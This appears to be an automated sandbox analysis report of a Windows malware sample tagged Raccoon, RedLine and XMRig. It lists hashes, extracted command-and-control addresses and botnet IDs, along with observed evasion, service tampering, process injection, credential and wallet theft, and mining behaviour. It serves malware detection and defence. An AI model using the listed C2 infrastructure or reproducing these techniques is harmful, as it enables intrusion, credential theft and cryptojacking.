raccoon | 3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055

Analysis

max time kernel
300s
max time network
282s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
19-10-2022 04:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe
Size

344KB
MD5

b9844cb9509f6252dcb12d4898f48624
SHA1

d2f377a1c8c070cb1884bf0b308e6fdf21067b73
SHA256

3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055
SHA512

a7d5b004a42a215452b3e89e5804a717325c5caaee65b08da6c0a73ca6d05f03dfbfc7242e1481d332f5d3fe8d1dbe48c2bbb3977c4f7ab54c6011952b0ba354
SSDEEP

6144:kq6LFGh9VxSaYmn9EqgJ/kQ4yuooheHRfcu+FM9m4P6u270ufmjrlRWz:knwnW4EqNyuooxu+ysAl24cex

Score

10^/10

raccoon redline xmrig 72aed310d11382f82b5918621baa858c 875784825 discovery evasion infostealer miner spyware stealer themida trojan upx

Malware Config

Extracted

Family

raccoon

Botnet

72aed310d11382f82b5918621baa858c

http://77.73.133.7/

rc4.plain

Extracted

Family

redline

Botnet

875784825

79.137.192.6:8362

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/80712-544-0x000000000041972E-mapping.dmp	family_redline
behavioral2/memory/80712-581-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup32.exeupdater.exeMoUSO.exesetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MoUSO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/8132-1503-0x00007FF676CC0000-0x00007FF6774B4000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

15 4556 WScript.exe
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

setup32.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts setup32.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 8 IoCs

Processes:

setup.exesetup32.exesetup3221.exe222.exe2.0.2-beta.exewatchdog.exeupdater.exeMoUSO.exe

pid process

3580 setup.exe
4348 setup32.exe
4200 setup3221.exe
4476 222.exe
4720 2.0.2-beta.exe
3116 watchdog.exe
756 updater.exe
5660 MoUSO.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
15	4556	WScript.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	setup32.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/8132-1498-0x00007FF676CC0000-0x00007FF6774B4000-memory.dmp	upx
behavioral2/memory/8132-1503-0x00007FF676CC0000-0x00007FF6774B4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MoUSO.exesetup.exesetup32.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MoUSO.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup.exeMoUSO.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Wine	setup.exe
Key opened	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Wine	MoUSO.exe

Loads dropped DLL 3 IoCs

Processes:

2.0.2-beta.exe

pid process

4720 2.0.2-beta.exe
4720 2.0.2-beta.exe
4720 2.0.2-beta.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4720	2.0.2-beta.exe
4720	2.0.2-beta.exe
4720	2.0.2-beta.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\setup32.exe	themida
behavioral2/memory/4348-228-0x00007FF60B770000-0x00007FF60C409000-memory.dmp	themida
behavioral2/memory/4348-520-0x00007FF60B770000-0x00007FF60C409000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\setup32.exe	themida
behavioral2/memory/4348-720-0x00007FF60B770000-0x00007FF60C409000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/756-756-0x00007FF78DDA0000-0x00007FF78EA39000-memory.dmp	themida
behavioral2/memory/756-1023-0x00007FF78DDA0000-0x00007FF78EA39000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/756-1499-0x00007FF78DDA0000-0x00007FF78EA39000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup32.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup32.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

setup.exesetup32.exeupdater.exeMoUSO.exe

pid process

3580 setup.exe
4348 setup32.exe
756 updater.exe
5660 MoUSO.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exewatchdog.exeupdater.exe

description	pid	process	target process
PID 2688 set thread context of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 3116 set thread context of 80712	3116	watchdog.exe	vbc.exe
PID 756 set thread context of 7976	756	updater.exe	conhost.exe
PID 756 set thread context of 8132	756	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

setup32.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3976 sc.exe
6608 sc.exe
6716 sc.exe
6744 sc.exe
6848 sc.exe
2216 sc.exe
3888 sc.exe
3256 sc.exe
5040 sc.exe
6792 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4304 schtasks.exe

pid	process
3976	sc.exe
6608	sc.exe
6716	sc.exe
6744	sc.exe
6848	sc.exe
2216	sc.exe
3888	sc.exe
3256	sc.exe
5040	sc.exe
6792	sc.exe

pid	process
4304	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe

Modifies registry class 1 IoCs

Processes:

setup3221.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings setup3221.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000_Classes\Local Settings	setup3221.exe

description	flow	ioc
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup.exepowershell.exepowershell.exepowershell.exevbc.exepowershell.exeMoUSO.exe

pid	process
3580	setup.exe
3580	setup.exe
80504	powershell.exe
80504	powershell.exe
80504	powershell.exe
3564	powershell.exe
3564	powershell.exe
3564	powershell.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
80712	vbc.exe
80712	vbc.exe
5524	powershell.exe
5524	powershell.exe
5524	powershell.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe
5660	MoUSO.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

632

pid	process
632

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vbc.exepowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	80712	vbc.exe
Token: SeDebugPrivilege	80504	powershell.exe
Token: SeIncreaseQuotaPrivilege	80504	powershell.exe
Token: SeSecurityPrivilege	80504	powershell.exe
Token: SeTakeOwnershipPrivilege	80504	powershell.exe
Token: SeLoadDriverPrivilege	80504	powershell.exe
Token: SeSystemProfilePrivilege	80504	powershell.exe
Token: SeSystemtimePrivilege	80504	powershell.exe
Token: SeProfSingleProcessPrivilege	80504	powershell.exe
Token: SeIncBasePriorityPrivilege	80504	powershell.exe
Token: SeCreatePagefilePrivilege	80504	powershell.exe
Token: SeBackupPrivilege	80504	powershell.exe
Token: SeRestorePrivilege	80504	powershell.exe
Token: SeShutdownPrivilege	80504	powershell.exe
Token: SeDebugPrivilege	80504	powershell.exe
Token: SeSystemEnvironmentPrivilege	80504	powershell.exe
Token: SeRemoteShutdownPrivilege	80504	powershell.exe
Token: SeUndockPrivilege	80504	powershell.exe
Token: SeManageVolumePrivilege	80504	powershell.exe
Token: 33	80504	powershell.exe
Token: 34	80504	powershell.exe
Token: 35	80504	powershell.exe
Token: 36	80504	powershell.exe
Token: SeShutdownPrivilege	4236	powercfg.exe
Token: SeCreatePagefilePrivilege	4236	powercfg.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeShutdownPrivilege	2436	powercfg.exe
Token: SeCreatePagefilePrivilege	2436	powercfg.exe
Token: SeShutdownPrivilege	3948	powercfg.exe
Token: SeCreatePagefilePrivilege	3948	powercfg.exe
Token: SeShutdownPrivilege	3040	powercfg.exe
Token: SeCreatePagefilePrivilege	3040	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3564	powershell.exe
Token: SeSecurityPrivilege	3564	powershell.exe
Token: SeTakeOwnershipPrivilege	3564	powershell.exe
Token: SeLoadDriverPrivilege	3564	powershell.exe
Token: SeSystemProfilePrivilege	3564	powershell.exe
Token: SeSystemtimePrivilege	3564	powershell.exe
Token: SeProfSingleProcessPrivilege	3564	powershell.exe
Token: SeIncBasePriorityPrivilege	3564	powershell.exe
Token: SeCreatePagefilePrivilege	3564	powershell.exe
Token: SeBackupPrivilege	3564	powershell.exe
Token: SeRestorePrivilege	3564	powershell.exe
Token: SeShutdownPrivilege	3564	powershell.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeSystemEnvironmentPrivilege	3564	powershell.exe
Token: SeRemoteShutdownPrivilege	3564	powershell.exe
Token: SeUndockPrivilege	3564	powershell.exe
Token: SeManageVolumePrivilege	3564	powershell.exe
Token: 33	3564	powershell.exe
Token: 34	3564	powershell.exe
Token: 35	3564	powershell.exe
Token: 36	3564	powershell.exe
Token: SeIncreaseQuotaPrivilege	3564	powershell.exe
Token: SeSecurityPrivilege	3564	powershell.exe
Token: SeTakeOwnershipPrivilege	3564	powershell.exe
Token: SeLoadDriverPrivilege	3564	powershell.exe
Token: SeSystemProfilePrivilege	3564	powershell.exe
Token: SeSystemtimePrivilege	3564	powershell.exe
Token: SeProfSingleProcessPrivilege	3564	powershell.exe
Token: SeIncBasePriorityPrivilege	3564	powershell.exe
Token: SeCreatePagefilePrivilege	3564	powershell.exe
Token: SeBackupPrivilege	3564	powershell.exe
Token: SeRestorePrivilege	3564	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exeRegSvcs.exesetup.exesetup3221.exe222.exewatchdog.exesetup32.execmd.execmd.exe

description	pid	process	target process
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2688 wrote to memory of 2740	2688	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2740 wrote to memory of 3580	2740	RegSvcs.exe	setup.exe
PID 2740 wrote to memory of 3580	2740	RegSvcs.exe	setup.exe
PID 2740 wrote to memory of 3580	2740	RegSvcs.exe	setup.exe
PID 3580 wrote to memory of 4304	3580	setup.exe	schtasks.exe
PID 3580 wrote to memory of 4304	3580	setup.exe	schtasks.exe
PID 3580 wrote to memory of 4304	3580	setup.exe	schtasks.exe
PID 2740 wrote to memory of 4348	2740	RegSvcs.exe	setup32.exe
PID 2740 wrote to memory of 4348	2740	RegSvcs.exe	setup32.exe
PID 2740 wrote to memory of 4200	2740	RegSvcs.exe	setup3221.exe
PID 2740 wrote to memory of 4200	2740	RegSvcs.exe	setup3221.exe
PID 2740 wrote to memory of 4200	2740	RegSvcs.exe	setup3221.exe
PID 4200 wrote to memory of 4556	4200	setup3221.exe	WScript.exe
PID 4200 wrote to memory of 4556	4200	setup3221.exe	WScript.exe
PID 4200 wrote to memory of 4556	4200	setup3221.exe	WScript.exe
PID 4200 wrote to memory of 4476	4200	setup3221.exe	222.exe
PID 4200 wrote to memory of 4476	4200	setup3221.exe	222.exe
PID 4200 wrote to memory of 4476	4200	setup3221.exe	222.exe
PID 4476 wrote to memory of 4720	4476	222.exe	2.0.2-beta.exe
PID 4476 wrote to memory of 4720	4476	222.exe	2.0.2-beta.exe
PID 4476 wrote to memory of 4720	4476	222.exe	2.0.2-beta.exe
PID 2740 wrote to memory of 3116	2740	RegSvcs.exe	watchdog.exe
PID 2740 wrote to memory of 3116	2740	RegSvcs.exe	watchdog.exe
PID 2740 wrote to memory of 3116	2740	RegSvcs.exe	watchdog.exe
PID 3116 wrote to memory of 80712	3116	watchdog.exe	vbc.exe
PID 3116 wrote to memory of 80712	3116	watchdog.exe	vbc.exe
PID 3116 wrote to memory of 80712	3116	watchdog.exe	vbc.exe
PID 3116 wrote to memory of 80712	3116	watchdog.exe	vbc.exe
PID 3116 wrote to memory of 80712	3116	watchdog.exe	vbc.exe
PID 4348 wrote to memory of 80504	4348	setup32.exe	powershell.exe
PID 4348 wrote to memory of 80504	4348	setup32.exe	powershell.exe
PID 4348 wrote to memory of 4884	4348	setup32.exe	cmd.exe
PID 4348 wrote to memory of 4884	4348	setup32.exe	cmd.exe
PID 4348 wrote to memory of 3372	4348	setup32.exe	cmd.exe
PID 4348 wrote to memory of 3372	4348	setup32.exe	cmd.exe
PID 4348 wrote to memory of 3564	4348	setup32.exe	powershell.exe
PID 4348 wrote to memory of 3564	4348	setup32.exe	powershell.exe
PID 3372 wrote to memory of 4236	3372	cmd.exe	powercfg.exe
PID 3372 wrote to memory of 4236	3372	cmd.exe	powercfg.exe
PID 4884 wrote to memory of 2216	4884	cmd.exe	sc.exe
PID 4884 wrote to memory of 2216	4884	cmd.exe	sc.exe
PID 3372 wrote to memory of 2436	3372	cmd.exe	powercfg.exe
PID 3372 wrote to memory of 2436	3372	cmd.exe	powercfg.exe
PID 4884 wrote to memory of 3888	4884	cmd.exe	sc.exe
PID 4884 wrote to memory of 3888	4884	cmd.exe	sc.exe
PID 3372 wrote to memory of 3948	3372	cmd.exe	powercfg.exe
PID 3372 wrote to memory of 3948	3372	cmd.exe	powercfg.exe
PID 4884 wrote to memory of 3976	4884	cmd.exe	sc.exe
PID 4884 wrote to memory of 3976	4884	cmd.exe	sc.exe
PID 3372 wrote to memory of 3040	3372	cmd.exe	powercfg.exe
PID 3372 wrote to memory of 3040	3372	cmd.exe	powercfg.exe
PID 4884 wrote to memory of 3256	4884	cmd.exe	sc.exe
PID 4884 wrote to memory of 3256	4884	cmd.exe	sc.exe
PID 4884 wrote to memory of 5040	4884	cmd.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe
"C:\Users\Admin\AppData\Local\Temp\3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe"
